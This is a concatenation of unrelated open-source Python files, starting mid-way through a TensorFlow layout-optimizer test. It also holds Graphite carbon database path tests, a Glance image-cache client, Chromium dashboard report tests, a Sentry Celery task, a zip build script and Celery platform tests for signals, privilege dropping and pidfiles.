metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('FusedBatchNorm-0', nodes)
self._assert_trans_nchw_to_nhwc('Add-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
@test_util.run_deprecated_v1
def testGradient(self):
meta_graph = _simple_metagraph()
config = config_pb2.ConfigProto()
config.graph_options.rewrite_options.CopyFrom(
rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON,
min_graph_nodes=-1))
optimized_graph = tf_optimizer.OptimizeGraph(
config, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in ['Conv2D', 'Conv2DBackpropFilter', 'Conv2DBackpropInput']:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 5)
@test_util.run_deprecated_v1
def testDepthwise(self):
meta_graph = _simple_metagraph(depthwise=True)
config = config_pb2.ConfigProto()
config.graph_options.rewrite_options.CopyFrom(
rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON,
min_graph_nodes=-1))
optimized_graph = tf_optimizer.OptimizeGraph(
config, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in [
'DepthwiseConv2dNative', 'DepthwiseConv2dNativeBackpropFilter',
'DepthwiseConv2dNativeBackpropInput'
]:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 6)
def testCheckpointCompatibility(self):
if not test.is_gpu_available(cuda_only=True):
self.skipTest('GPU required')
checkpoint_path = self.get_temp_dir()
self._train(checkpoint_path)
vars_expected = self._train(checkpoint_path, restore=True)
vars_layout_optimized = self._train(
checkpoint_path, restore=True, layout_optimizer=True)
for var_expected, var_layout_optimized in zip(vars_expected,
vars_layout_optimized):
self.assertAllClose(var_expected, var_layout_optimized, atol=1e-6)
if __name__ == '__main__':
test.main()
|
import os
from unittest import TestCase
from mock import patch
from os.path import exists
import shutil
from carbon.tests.util import TestSettings
from carbon.database import WhisperDatabase, CeresDatabase
class WhisperDatabaseTest(TestCase):
def setUp(self):
self._sep_patch = patch.object(os.path, 'sep', "/")
self._sep_patch.start()
def tearDown(self):
self._sep_patch.stop()
def test_getFilesystemPath(self):
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
database = WhisperDatabase(settings)
result = database.getFilesystemPath('stats.example.counts')
self.assertEqual(result, '/tmp/stats/example/counts.wsp') # nosec
def test_getTaggedFilesystemPath(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = WhisperDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1.wsp') # nosec
result = database.exists(metric)
self.assertEqual(result, False)
def test_getTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = True
database = WhisperDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0.wsp')
result = database.exists(metric)
self.assertEqual(result, False)
def test_migrateTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = WhisperDatabase(settings)
result = database.exists(metric)
self.assertEqual(result, False)
old_path = database.getFilesystemPath(metric)
self.assertEqual(
old_path, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1.wsp') # nosec
self.assertEqual(exists(old_path), False)
result = database.create(metric, [(60, 60)], 0.5, 'average')
self.assertEqual(exists(old_path), True)
result = database.exists(metric)
self.assertEqual(result, True)
settings['TAG_HASH_FILENAMES'] = True
database = WhisperDatabase(settings)
hashed_path = database.getFilesystemPath(metric)
self.assertEqual(
hashed_path,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0.wsp')
self.assertEqual(exists(hashed_path), False)
result = database.exists(metric)
self.assertEqual(result, True)
self.assertEqual(exists(old_path), False)
self.assertEqual(exists(hashed_path), True)
os.remove(hashed_path)
class CeresDatabaseTest(TestCase):
def setUp(self):
self._sep_patch = patch.object(os.path, 'sep', "/")
self._sep_patch.start()
def tearDown(self):
self._sep_patch.stop()
def test_getFilesystemPath(self):
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
database = CeresDatabase(settings)
result = database.getFilesystemPath('stats.example.counts')
self.assertEqual(result, '/tmp/stats/example/counts') # nosec
def test_getTaggedFilesystemPath(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = CeresDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1') # nosec
result = database.exists(metric)
self.assertEqual(result, False)
def test_getTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = True
database = CeresDatabase(settings)
result = database.getFilesystemPath(metric)
self.assertEqual(
result,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0')
result = database.exists(metric)
self.assertEqual(result, False)
def test_migrateTaggedFilesystemPathHashed(self):
metric = 'stats.example.counts;tag1=value1'
settings = TestSettings()
settings['LOCAL_DATA_DIR'] = '/tmp/'
settings['TAG_HASH_FILENAMES'] = False
database = CeresDatabase(settings)
result = database.exists(metric)
self.assertEqual(result, False)
old_path = database.getFilesystemPath(metric)
self.assertEqual(
old_path, '/tmp/_tagged/872/252/stats_DOT_example_DOT_counts;tag1=value1') # nosec
self.assertEqual(exists(old_path), False)
result = database.create(metric, [(60, 60)], 0.5, 'average')
self.assertEqual(exists(old_path), True)
result = database.exists(metric)
self.assertEqual(result, True)
settings['TAG_HASH_FILENAMES'] = True
database = CeresDatabase(settings)
hashed_path = database.getFilesystemPath(metric)
self.assertEqual(
hashed_path,
'/tmp/_tagged/872/252/' + # nosec
'872252dcead671982862f82a3b440f02aa8f525dd6d0f2921de0dc2b3e874ad0')
self.assertEqual(exists(hashed_path), False)
result = database.exists(metric)
self.assertEqual(result, True)
self.assertEqual(exists(old_path), False)
self.assertEqual(exists(hashed_path), True)
shutil.rmtree(hashed_path)
|
import os
from oslo.serialization import jsonutils as json
from glance.common import client as base_client
from glance.common import exception
from glance import i18n
_ = i18n._
class CacheClient(base_client.BaseClient):
DEFAULT_PORT = 9292
DEFAULT_DOC_ROOT = '/v1'
def delete_cached_image(self, image_id):
"""
Delete a specified image from the cache
"""
self.do_request("DELETE", "/cached_images/%s" % image_id)
return True
def get_cached_images(self, **kwargs):
"""
Returns a list of images stored in the image cache.
"""
res = self.do_request("GET", "/cached_images")
data = json.loads(res.read())['cached_images']
return data
def get_queued_images(self, **kwargs):
"""
Returns a list of images queued for caching
"""
res = self.do_request("GET", "/queued_images")
data = json.loads(res.read())['queued_images']
return data
def delete_all_cached_images(self):
"""
Delete all cached images
"""
res = self.do_request("DELETE", "/cached_images")
data = json.loads(res.read())
num_deleted = data['num_deleted']
return num_deleted
def queue_image_for_caching(self, image_id):
"""
Queue an image for prefetching into cache
"""
self.do_request("PUT", "/queued_images/%s" % image_id)
return True
def delete_queued_image(self, image_id):
"""
Delete a specified image from the cache queue
"""
self.do_request("DELETE", "/queued_images/%s" % image_id)
return True
def delete_all_queued_images(self):
"""
Delete all queued images
"""
res = self.do_request("DELETE", "/queued_images")
data = json.loads(res.read())
num_deleted = data['num_deleted']
return num_deleted
def get_client(host, port=None, timeout=None, use_ssl=False, username=None,
password=None, tenant=None,
auth_url=None, auth_strategy=None,
auth_token=None, region=None,
is_silent_upload=False, insecure=False):
"""
Returns a new client Glance client object based on common kwargs.
If an option isn't specified falls back to common environment variable
defaults.
"""
if auth_url or os.getenv('OS_AUTH_URL'):
force_strategy = 'keystone'
else:
force_strategy = None
creds = {
'username': username or
os.getenv('OS_AUTH_USER', os.getenv('OS_USERNAME')),
'password': password or
os.getenv('OS_AUTH_KEY', os.getenv('OS_PASSWORD')),
'tenant': tenant or
os.getenv('OS_AUTH_TENANT', os.getenv('OS_TENANT_NAME')),
'auth_url': auth_url or
os.getenv('OS_AUTH_URL'),
'strategy': force_strategy or
auth_strategy or
os.getenv('OS_AUTH_STRATEGY', 'noauth'),
'region': region or
os.getenv('OS_REGION_NAME'),
}
if creds['strategy'] == 'keystone' and not creds['auth_url']:
msg = _("--os_auth_url option or OS_AUTH_URL environment variable "
"required when keystone authentication strategy is enabled\n")
raise exception.ClientConfigurationError(msg)
return CacheClient(
host=host,
port=port,
timeout=timeout,
use_ssl=use_ssl,
auth_token=auth_token or
os.getenv('OS_TOKEN'),
creds=creds,
insecure=insecure)
|
import sys
if sys.version_info[:2] >= (3, 3):
import queue
else:
import Queue as queue
from pickle import PicklingError
if sys.version_info >= (3, 4):
from multiprocessing.process import BaseProcess
else:
from multiprocessing.process import Process as BaseProcess
if sys.platform == "win32":
from .compat_win32 import *
else:
from .compat_posix import *
|
import unittest
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import group_report
from dashboard import test_owner
from dashboard import testing_common
from dashboard import utils
from dashboard.models import anomaly
from dashboard.models import bug_data
from dashboard.models import sheriff
from dashboard.models import stoppage_alert
class GroupReportTest(testing_common.TestCase):
def setUp(self):
super(GroupReportTest, self).setUp()
app = webapp2.WSGIApplication(
[('/group_report', group_report.GroupReportHandler)])
self.testapp = webtest.TestApp(app)
def _AddAnomalyEntities(
self, revision_ranges, test_key, sheriff_key, bug_id=None):
"""Adds a group of Anomaly entities to the datastore."""
urlsafe_keys = []
for start_rev, end_rev in revision_ranges:
anomaly_key = anomaly.Anomaly(
start_revision=start_rev, end_revision=end_rev,
test=test_key, bug_id=bug_id, sheriff=sheriff_key,
median_before_anomaly=100, median_after_anomaly=200).put()
urlsafe_keys.append(anomaly_key.urlsafe())
return urlsafe_keys
def _AddTests(self):
"""Adds sample Test entities and returns their keys."""
testing_common.AddTests(['ChromiumGPU'], ['linux-release'], {
'scrolling-benchmark': {
'first_paint': {},
'mean_frame_time': {},
}
})
keys = [
utils.TestKey(
'ChromiumGPU/linux-release/scrolling-benchmark/first_paint'),
utils.TestKey(
'ChromiumGPU/linux-release/scrolling-benchmark/mean_frame_time'),
]
# By default, all Test entities have an improvement_direction of UNKNOWN,
# meaning that neither direction is considered an improvement.
# Here we set the improvement direction so that some anomalies are
# considered improvements.
for test_key in keys:
test = test_key.get()
test.improvement_direction = anomaly.DOWN
test.put()
return keys
def _AddSheriff(self):
"""Adds a Sheriff entity and returns the key."""
return sheriff.Sheriff(
id='Chromium Perf Sheriff', email='sullivan@google.com').put()
def testGet_WithAnomalyKeys_ShowsSelectedAndOverlapping(self):
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
selected_ranges = [(400, 900), (200, 700)]
overlapping_ranges = [(300, 500), (500, 600), (600, 800)]
non_overlapping_ranges = [(100, 200)]
selected_keys = self._AddAnomalyEntities(
selected_ranges, test_keys[0], sheriff_key)
self._AddAnomalyEntities(
overlapping_ranges, test_keys[0], sheriff_key)
self._AddAnomalyEntities(
non_overlapping_ranges, test_keys[0], sheriff_key)
response = self.testapp.get(
'/group_report?keys=%s' % ','.join(selected_keys))
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
# Expect selected alerts + overlapping alerts,
# but not the non-overlapping alert.
self.assertEqual(5, len(alert_list))
def testGet_WithKeyOfNonExistentAlert_ShowsError(self):
key = ndb.Key('Anomaly', 123)
response = self.testapp.get('/group_report?keys=%s' % key.urlsafe())
self.assertIn('error', response.body)
self.assertIn('No Anomaly found for key', response.body)
def testGet_WithInvalidKeyParameter_ShowsError(self):
response = self.testapp.get('/group_report?keys=foobar')
self.assertIn('error', response.body)
self.assertIn('Invalid Anomaly key', response.body)
def testGet_WithRevParameter(self):
# If the rev parameter is given, then all alerts whose revision range
# includes the given revision should be included.
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
self._AddAnomalyEntities(
[(190, 210), (200, 300), (100, 200), (400, 500)],
test_keys[0], sheriff_key)
response = self.testapp.get('/group_report?rev=200')
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
self.assertEqual(3, len(alert_list))
def testGet_WithInvalidRevParameter_ShowsError(self):
response = self.testapp.get('/group_report?rev=foo')
self.assertIn('error', response.body)
self.assertIn('Invalid rev', response.body)
def testGet_WithBugIdParameter(self):
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
bug_data.Bug(id=123).put()
self._AddAnomalyEntities(
[(200, 300), (100, 200), (400, 500)],
test_keys[0], sheriff_key, bug_id=123)
self._AddAnomalyEntities(
[(150, 250)], test_keys[0], sheriff_key)
response = self.testapp.get('/group_report?bug_id=123')
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
self.assertEqual(3, len(alert_list))
def testGet_WithBugIdParameter_ListsStoppageAlerts(self):
test_keys = self._AddTests()
bug_data.Bug(id=123).put()
row = testing_common.AddRows(utils.TestPath(test_keys[0]), {100})[0]
alert = stoppage_alert.CreateStoppageAlert(test_keys[0].get(), row)
alert.bug_id = 123
alert.put()
response = self.testapp.get('/group_report?bug_id=123')
alert_list = self.GetEmbeddedVariable(response, 'ALERT_LIST')
self.assertEqual(1, len(alert_list))
def testGet_WithBugIdForBugThatHasOwner_ShowsOwnerInfo(self):
sheriff_key = self._AddSheriff()
test_keys = self._AddTests()
bug_data.Bug(id=123).put()
test_key = test_keys[0]
test_path_parts = utils.TestPath(test_key).split('/')
test_suite_path = '%s/%s' % (test_path_parts[0], test_path_parts[2])
test_owner.AddOwnerFromDict({test_suite_path: ['foo@bar.com']})
self._AddAnomalyEntities([(150, 250)], test_key, sheriff_key, bug_id=123)
response = self.testapp.get('/group_report?bug_id=123')
owner_info = self.GetEmbeddedVariable(response, 'OWNER_INFO')
self.assertEqual('foo@bar.com', owner_info[0]['email'])
def testGet_WithInvalidBugIdParameter_ShowsError(self):
response = self.testapp.get('/group_report?bug_id=foo')
self.assertNotIn('ALERT_LIST', response.body)
self.assertIn('Invalid bug ID', response.body)
if __name__ == '__main__':
unittest.main()
|
from __future__ import unicode_literals
from ..model import Level1Design
def test_Level1Design_inputs():
input_map = dict(bases=dict(mandatory=True,
),
contrasts=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
interscan_interval=dict(mandatory=True,
),
model_serial_correlations=dict(mandatory=True,
),
orthogonalization=dict(),
session_info=dict(mandatory=True,
),
)
inputs = Level1Design.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_Level1Design_outputs():
output_map = dict(ev_files=dict(),
fsf_files=dict(),
)
outputs = Level1Design.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
|
"""
sentry.client.celery.tasks
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from celery.decorators import task
from sentry.client.base import SentryClient
from sentry.client.celery import conf
@task(routing_key=conf.CELERY_ROUTING_KEY)
def send(data):
return SentryClient().send(**data)
|
import argparse
import zipfile
import os
import sys
def _zip_dir(path, zip_file, prefix):
path = path.rstrip('/\\')
for root, dirs, files in os.walk(path):
for file in files:
zip_file.write(os.path.join(root, file), os.path.join(
root.replace(path, prefix), file))
def main(args):
zip_file = zipfile.ZipFile(args.output, 'w', zipfile.ZIP_DEFLATED)
for path, archive_name in args.input_pairs:
if os.path.isdir(path):
_zip_dir(path, zip_file, archive_name)
else:
zip_file.write(path, archive_name)
zip_file.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='This script creates zip files.')
parser.add_argument('-o', dest='output', action='store',
help='The name of the output zip file.')
parser.add_argument('-i', dest='input_pairs', nargs=2, action='append',
help='The input file and its destination location in the zip archive.')
sys.exit(main(parser.parse_args()))
|
from __future__ import absolute_import
import errno
import os
import sys
import signal
from celery import _find_option_with_arg
from celery import platforms
from celery.five import open_fqdn
from celery.platforms import (
get_fdmax,
ignore_errno,
set_process_title,
signals,
maybe_drop_privileges,
setuid,
setgid,
initgroups,
parse_uid,
parse_gid,
detached,
DaemonContext,
create_pidlock,
Pidfile,
LockFailed,
setgroups,
_setgroups_hack,
close_open_fds,
)
try:
import resource
except ImportError: # pragma: no cover
resource = None # noqa
from celery.tests.case import (
Case, WhateverIO, Mock, SkipTest,
call, override_stdouts, mock_open, patch,
)
class test_find_option_with_arg(Case):
def test_long_opt(self):
self.assertEqual(
_find_option_with_arg(['--foo=bar'], long_opts=['--foo']),
'bar'
)
def test_short_opt(self):
self.assertEqual(
_find_option_with_arg(['-f', 'bar'], short_opts=['-f']),
'bar'
)
class test_close_open_fds(Case):
def test_closes(self):
with patch('os.close') as _close:
with patch('os.closerange', create=True) as closerange:
with patch('celery.platforms.get_fdmax') as fdmax:
fdmax.return_value = 3
close_open_fds()
if not closerange.called:
_close.assert_has_calls([call(2), call(1), call(0)])
_close.side_effect = OSError()
_close.side_effect.errno = errno.EBADF
close_open_fds()
class test_ignore_errno(Case):
def test_raises_EBADF(self):
with ignore_errno('EBADF'):
exc = OSError()
exc.errno = errno.EBADF
raise exc
def test_otherwise(self):
with self.assertRaises(OSError):
with ignore_errno('EBADF'):
exc = OSError()
exc.errno = errno.ENOENT
raise exc
class test_set_process_title(Case):
def when_no_setps(self):
prev = platforms._setproctitle = platforms._setproctitle, None
try:
set_process_title('foo')
finally:
platforms._setproctitle = prev
class test_Signals(Case):
@patch('signal.getsignal')
def test_getitem(self, getsignal):
signals['SIGINT']
getsignal.assert_called_with(signal.SIGINT)
def test_supported(self):
self.assertTrue(signals.supported('INT'))
self.assertFalse(signals.supported('SIGIMAGINARY'))
def test_reset_alarm(self):
if sys.platform == 'win32':
raise SkipTest('signal.alarm not available on Windows')
with patch('signal.alarm') as _alarm:
signals.reset_alarm()
_alarm.assert_called_with(0)
def test_arm_alarm(self):
if hasattr(signal, 'setitimer'):
with patch('signal.setitimer', create=True) as seti:
signals.arm_alarm(30)
self.assertTrue(seti.called)
def test_signum(self):
self.assertEqual(signals.signum(13), 13)
self.assertEqual(signals.signum('INT'), signal.SIGINT)
self.assertEqual(signals.signum('SIGINT'), signal.SIGINT)
with self.assertRaises(TypeError):
signals.signum('int')
signals.signum(object())
@patch('signal.signal')
def test_ignore(self, set):
signals.ignore('SIGINT')
set.assert_called_with(signals.signum('INT'), signals.ignored)
signals.ignore('SIGTERM')
set.assert_called_with(signals.signum('TERM'), signals.ignored)
@patch('signal.signal')
def test_setitem(self, set):
handle = lambda *a: a
signals['INT'] = handle
set.assert_called_with(signal.SIGINT, handle)
@patch('signal.signal')
def test_setitem_raises(self, set):
set.side_effect = ValueError()
signals['INT'] = lambda *a: a
if not platforms.IS_WINDOWS:
class test_get_fdmax(Case):
@patch('resource.getrlimit')
def test_when_infinity(self, getrlimit):
with patch('os.sysconf') as sysconfig:
sysconfig.side_effect = KeyError()
getrlimit.return_value = [None, resource.RLIM_INFINITY]
default = object()
self.assertIs(get_fdmax(default), default)
@patch('resource.getrlimit')
def test_when_actual(self, getrlimit):
with patch('os.sysconf') as sysconfig:
sysconfig.side_effect = KeyError()
getrlimit.return_value = [None, 13]
self.assertEqual(get_fdmax(None), 13)
class test_maybe_drop_privileges(Case):
@patch('celery.platforms.parse_uid')
@patch('pwd.getpwuid')
@patch('celery.platforms.setgid')
@patch('celery.platforms.setuid')
@patch('celery.platforms.initgroups')
def test_with_uid(self, initgroups, setuid, setgid,
getpwuid, parse_uid):
class pw_struct(object):
pw_gid = 50001
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
setuid.side_effect = raise_on_second_call
getpwuid.return_value = pw_struct()
parse_uid.return_value = 5001
maybe_drop_privileges(uid='user')
parse_uid.assert_called_with('user')
getpwuid.assert_called_with(5001)
setgid.assert_called_with(50001)
initgroups.assert_called_with(5001, 50001)
setuid.assert_has_calls([call(5001), call(0)])
@patch('celery.platforms.parse_uid')
@patch('celery.platforms.parse_gid')
@patch('celery.platforms.setgid')
@patch('celery.platforms.setuid')
@patch('celery.platforms.initgroups')
def test_with_guid(self, initgroups, setuid, setgid,
parse_gid, parse_uid):
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
setuid.side_effect = raise_on_second_call
parse_uid.return_value = 5001
parse_gid.return_value = 50001
maybe_drop_privileges(uid='user', gid='group')
parse_uid.assert_called_with('user')
parse_gid.assert_called_with('group')
setgid.assert_called_with(50001)
initgroups.assert_called_with(5001, 50001)
setuid.assert_has_calls([call(5001), call(0)])
setuid.side_effect = None
with self.assertRaises(RuntimeError):
maybe_drop_privileges(uid='user', gid='group')
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EINVAL
with self.assertRaises(OSError):
maybe_drop_privileges(uid='user', gid='group')
@patch('celery.platforms.setuid')
@patch('celery.platforms.setgid')
@patch('celery.platforms.parse_gid')
def test_only_gid(self, parse_gid, setgid, setuid):
parse_gid.return_value = 50001
maybe_drop_privileges(gid='group')
parse_gid.assert_called_with('group')
setgid.assert_called_with(50001)
self.assertFalse(setuid.called)
class test_setget_uid_gid(Case):
@patch('celery.platforms.parse_uid')
@patch('os.setuid')
def test_setuid(self, _setuid, parse_uid):
parse_uid.return_value = 5001
setuid('user')
parse_uid.assert_called_with('user')
_setuid.assert_called_with(5001)
@patch('celery.platforms.parse_gid')
@patch('os.setgid')
def test_setgid(self, _setgid, parse_gid):
parse_gid.return_value = 50001
setgid('group')
parse_gid.assert_called_with('group')
_setgid.assert_called_with(50001)
def test_parse_uid_when_int(self):
self.assertEqual(parse_uid(5001), 5001)
@patch('pwd.getpwnam')
def test_parse_uid_when_existing_name(self, getpwnam):
class pwent(object):
pw_uid = 5001
getpwnam.return_value = pwent()
self.assertEqual(parse_uid('user'), 5001)
@patch('pwd.getpwnam')
def test_parse_uid_when_nonexisting_name(self, getpwnam):
getpwnam.side_effect = KeyError('user')
with self.assertRaises(KeyError):
parse_uid('user')
def test_parse_gid_when_int(self):
self.assertEqual(parse_gid(50001), 50001)
@patch('grp.getgrnam')
def test_parse_gid_when_existing_name(self, getgrnam):
class grent(object):
gr_gid = 50001
getgrnam.return_value = grent()
self.assertEqual(parse_gid('group'), 50001)
@patch('grp.getgrnam')
def test_parse_gid_when_nonexisting_name(self, getgrnam):
getgrnam.side_effect = KeyError('group')
with self.assertRaises(KeyError):
parse_gid('group')
class test_initgroups(Case):
@patch('pwd.getpwuid')
@patch('os.initgroups', create=True)
def test_with_initgroups(self, initgroups_, getpwuid):
getpwuid.return_value = ['user']
initgroups(5001, 50001)
initgroups_.assert_called_with('user', 50001)
@patch('celery.platforms.setgroups')
@patch('grp.getgrall')
@patch('pwd.getpwuid')
def test_without_initgroups(self, getpwuid, getgrall, setgroups):
prev = getattr(os, 'initgroups', None)
try:
delattr(os, 'initgroups')
except AttributeError:
pass
try:
getpwuid.return_value = ['user']
class grent(object):
gr_mem = ['user']
def __init__(self, gid):
self.gr_gid = gid
getgrall.return_value = [grent(1), grent(2), grent(3)]
initgroups(5001, 50001)
setgroups.assert_called_with([1, 2, 3])
finally:
if prev:
os.initgroups = prev
class test_detached(Case):
def test_without_resource(self):
prev, platforms.resource = platforms.resource, None
try:
with self.assertRaises(RuntimeError):
detached()
finally:
platforms.resource = prev
@patch('celery.platforms._create_pidlock')
@patch('celery.platforms.signals')
@patch('celery.platforms.maybe_drop_privileges')
@patch('os.geteuid')
@patch(open_fqdn)
def test_default(self, open, geteuid, maybe_drop,
signals, pidlock):
geteuid.return_value = 0
context = detached(uid='user', gid='group')
self.assertIsInstance(context, DaemonContext)
signals.reset.assert_called_with('SIGCLD')
maybe_drop.assert_called_with(uid='user', gid='group')
open.return_value = Mock()
geteuid.return_value = 5001
context = detached(uid='user', gid='group', logfile='/foo/bar')
self.assertIsInstance(context, DaemonContext)
self.assertTrue(context.after_chdir)
context.after_chdir()
open.assert_called_with('/foo/bar', 'a')
open.return_value.close.assert_called_with()
context = detached(pidfile='/foo/bar/pid')
self.assertIsInstance(context, DaemonContext)
self.assertTrue(context.after_chdir)
context.after_chdir()
pidlock.assert_called_with('/foo/bar/pid')
class test_DaemonContext(Case):
@patch('os.fork')
@patch('os.setsid')
@patch('os._exit')
@patch('os.chdir')
@patch('os.umask')
@patch('os.close')
@patch('os.closerange')
@patch('os.open')
@patch('os.dup2')
def test_open(self, dup2, open, close, closer, umask, chdir,
_exit, setsid, fork):
x = DaemonContext(workdir='/opt/workdir', umask=0o22)
x.stdfds = [0, 1, 2]
fork.return_value = 0
with x:
self.assertTrue(x._is_open)
with x:
pass
self.assertEqual(fork.call_count, 2)
setsid.assert_called_with()
self.assertFalse(_exit.called)
chdir.assert_called_with(x.workdir)
umask.assert_called_with(0o22)
self.assertTrue(dup2.called)
fork.reset_mock()
fork.return_value = 1
x = DaemonContext(workdir='/opt/workdir')
x.stdfds = [0, 1, 2]
with x:
pass
self.assertEqual(fork.call_count, 1)
_exit.assert_called_with(0)
x = DaemonContext(workdir='/opt/workdir', fake=True)
x.stdfds = [0, 1, 2]
x._detach = Mock()
with x:
pass
self.assertFalse(x._detach.called)
x.after_chdir = Mock()
with x:
pass
x.after_chdir.assert_called_with()
class test_Pidfile(Case):
@patch('celery.platforms.Pidfile')
def test_create_pidlock(self, Pidfile):
p = Pidfile.return_value = Mock()
p.is_locked.return_value = True
p.remove_if_stale.return_value = False
with override_stdouts() as (_, err):
with self.assertRaises(SystemExit):
create_pidlock('/var/pid')
self.assertIn('already exists', err.getvalue())
p.remove_if_stale.return_value = True
ret = create_pidlock('/var/pid')
self.assertIs(ret, p)
def test_context(self):
p = Pidfile('/var/pid')
p.write_pid = Mock()
p.remove = Mock()
with p as _p:
self.assertIs(_p, p)
p.write_pid.assert_called_with()
p.remove.assert_called_with()
def test_acquire_raises_LockFailed(self):
p = Pidfile('/var/pid')
p.write_pid = Mock()
p.write_pid.side_effect = OSError()
with self.assertRaises(LockFailed):
with p:
pass
@patch('os.path.exists')
def test_is_locked(self, exists):
p = Pidfile('/var/pid')
exists.return_value = True
self.assertTrue(p.is_locked())
exists.return_value = False
self.assertFalse(p.is_locked())
def test_read_pid(self):
with mock_open() as s:
s.write('1816\n')
s.seek(0)
p = Pidfile('/var/pid')
self.assertEqual(p.read_pid(), 1816)
def test_read_pid_partially_written(self):
with mock_open() as s:
s.write('1816')
s.seek(0)
p = Pidfile('/var/pid')
with self.assertRaises(ValueError):
p.read_pid()
def test_read_pid_raises_ENOENT(self):
exc = IOError()
exc.errno = errno.ENOENT
with mock_open(side_effect=exc):
p = Pidfile('/var/pid')
self.assertIsNone(p.read_pid())
def test_read_pid_raises_IOError(self):
exc = IOError()
exc.errno = errno.EAGAIN
with mock_open(side_effect=exc):
p = Pidfile('/var/pid')
with self.assertRaises(IOError):
p.read_pid()
def test_read_pid_bogus_pidfile(self):
with mock_open() as s:
s.write('eighteensixteen\n')
s.seek(0)
p = Pidfile('/var/pid')
with self.assertRaises(ValueError):
p.read_pid()
@patch('os.unlink')
def test_remove(self, unlink):
unlink.return_value = True
p = Pidfile('/var/pid')
p.remove()
unlink.assert_called_with(p.path)
@patch('os.unlink')
def test_remove_ENOENT(self, unlink):
exc = OSError()
exc.errno = errno.ENOENT
unlink.side_effect = exc
p = Pidfile('/var/pid')
p.remove()
unlink.assert_called_with(p.path)
@patch('os.unlink')
def test_remove_EACCES(self, unlink):
exc = OSError()
exc.errno = errno.EACCES
unlink.side_effect = exc
p = Pidfile('/var/pid')
p.remove()
unlink.assert_called_with(p.path)
@patch('os.unlink')
def test_remove_OSError(self, unlink):
exc = OSError()
exc.errno = errno.EAGAIN
unlink.side_effect = exc
p = Pidfile('/var/pid')
with self.assertRaises(OSError):
p.remove()
unlink.assert_called_with(p.path)
@patch('os.kill')
def test_remove_if_stale_process_alive(self, kill):
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
kill.return_value = 0
self.assertFalse(p.remove_if_stale())
kill.assert_called_with(1816, 0)
p.read_pid.assert_called_with()
kill.side_effect = OSError()
kill.side_effect.errno = errno.ENOENT
self.assertFalse(p.remove_if_stale())
@patch('os.kill')
def test_remove_if_stale_process_dead(self, kill):
with override_stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
p.remove = Mock()
exc = OSError()
exc.errno = errno.ESRCH
kill.side_effect = exc
self.assertTrue(p.remove_if_stale())
kill.assert_called_with(1816, 0)
p.remove.assert_called_with()
def test_remove_if_stale_broken_pid(self):
with override_stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.side_effect = ValueError()
p.remove = Mock()
self.assertTrue(p.remove_if_stale())
p.remove.assert_called_with()
